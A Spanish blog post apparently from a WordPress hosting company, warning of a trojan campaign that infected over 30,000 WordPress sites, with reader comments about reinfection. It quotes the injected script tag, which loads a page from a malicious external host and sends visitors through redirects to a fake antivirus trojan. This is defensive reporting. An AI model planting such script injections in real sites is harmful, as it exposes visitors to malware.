06mar
10

Alojamiento Wordpress con Soporte

En Websense Security Labs han avisado de que hay más de 30.000 instalaciones de WordPress ya infectadas mediante un troyano que añade código de redirección en la web afectada.

Los sitios infectados tenían versiones no actualizadas de WordPress, contraseñas inseguras y plugins vulnerables.

El código que inyecta se coloca antes de la etiqueta < / body > y suele ser algo así:

</div><!--End-body-wrapper-->
<script src="http:// ionis90landsi.rr.nu /mm.php ?d=1"></script></body></html>

Tras una cadena de redirecciones de tres niveles las víctimas aterrizan en un sitio de antivirus falso. El antivirus de pega parece realizar un escaneo del ordenador y avisa al usuario mostrando detecciones de malware falso de varios tipos de troyanos. La página parece una ventana del explorador de Windows, con el título de “Windows Security Alert“.

El proceso falso de escaneo parece una aplicación Windows, pero en realidad es una simple ventana emergente del navegador. Luego, el falso antivirus pide al “visitante” que descargue y ejecute una herramienta antivirus que – supuestamente – ha encontrado los troyanos. El ejecutable mismo es un troyano ¿qué esperabas?.

La mayoría de los sitios infectados están en los EEUU como puedes ver en este tráfico:

Y los visitantes a la página falsa ya son de un montón de países, todos angloparlantes:

¿Recomendaciones?

  • Actualiza WordPress a la última versión siempre
  • Usa solo plugins y temas seguros
  • No uses contraseñas sencillas
  • Protege tus carpetas y archivos de la instalación de WordPress
  • No alimentes el efecto pebcak
  • Instala un buen antivirus si usas Windows

Gracias a Jose por avisar y a Ze y bi0xid por las coñas marineras


Valora este artículo para mejorar la calidad del blog ...

MaloPobreNo está malMe gustaExcelente (sin valoración aún)
Loading ... Loading ...
9ebc3a4bbf729c512b3b577fe8e3e47d
Share

Anúnciese aquí »


  • Rwcamera

    Tengo alojados varios sitios en Dreamhost y los tengo todos afectados. Ya sufrí el anterior ataque que también das cuenta en el blog en otra entrada.

    Lo que no se por donde entra porque tengo un blog con wordpress actualizado, contraseñas cambiadas y sólo con el plugin askimet y también se ha infectado.

    La solución que he tomado es subir todo de nuevo y esperar a posibles instrucciones de seguridad que vayamos aprendiendo.

    La verdad, está siendo demoledor, nos está dando mucho trabajo.

  • malder

    Yo tambien tengo afectadas todas mis cuentas de dreamhost, infectan todos los archivos php, realmente ya pienso que es un problema de seguridad de dreamhost

  • Paula

    Curioso, aun tengo que ver el primer drupal crackeado.

  • Geabing

    Gracias Fernando…siempre muy útiles tus aportes. En caso de un wp infectado, recomiendas algún anti virus o la reinstalación? Saludos!

    • http://twitter.com/yggdrasilfs Camelot

       Los "antivirus" en wordpress solo detectan archivos infectados pero no corrigen los problemas ni eliminan archivos infectados. Lamentablemente, debes hacerlo manualmente y por eso muchos prefieren hacer una reinstalación porque es más rápida (a pesar de todo).

  • http://www.dogguie.com/ Dogguie

    Yo también tengo ese maldito problema. Opté por instalar todo wordpress, también cambié el usuario de la db, la contraseña, pero aun no lo hago con la cuenta de ftp. Supongo que ésta también debo cambiarla.

    La pregunta del millón: ¿No hay forma de evitar ser contagiado?… coño!!!! tal como dicen por ahí… es un verdadero trabajo instalar todo otra vez :(

  • Shouldes

    Hola …llegue tarde a conocer este blog .Ya he cometido todos esos  errores como instalar themes gratuitos de dudosa procedencia ….fernando quisiera saber si tienes o podrias hacer una guia de como eliminar todo rastro de estas infecciones he cambiado contraseñas , desado la instalacion practicamente sin plugins y comprado un thema premium ….¿Alguno de ustedes podria ayudarme ?

  • Alberto V.R

    Yo estoy con Dreamhost y me pasa exactamente lo mismo. He reistalado, cambiado contraseñas, base de datos…. y se vuelve a infectar. Como dice alguno de vosotros debe ser un fallo de seguridad de wordpress. A ver si existe alguna solución. Saludos!

  • http://twitter.com/yggdrasilfs Camelot

    Uno de las web que administro está en Dreamhost y los visitantes recibían constantemente advertencias de seguridad de Google (en Firefox y Chrome así como IE y Opera). Reinstalé todo wordpress pero nada. Finalmente borraron un foro que estaba alojado en el mismo espacio y finalmente el último reporte de Google ya no lanza ninguna advertencia a los visitantes.

    En el proceso he instalado WP Firewall 2 (muy bueno evitando intrusiones), TAC Theme Authenticity Checker para identificar themes con código escondido (ojo, que hay themes legítimos que también lo tienen) y Better WP Security… además de seguir alguno que otro tip adicional. El resultado es que de varios intentos de intrusión diarios que recibía de China, Ucrania y tantos otros lugares, ahora prácticamente no tengo ninguno.

  • lol

    no teen setio este codiigo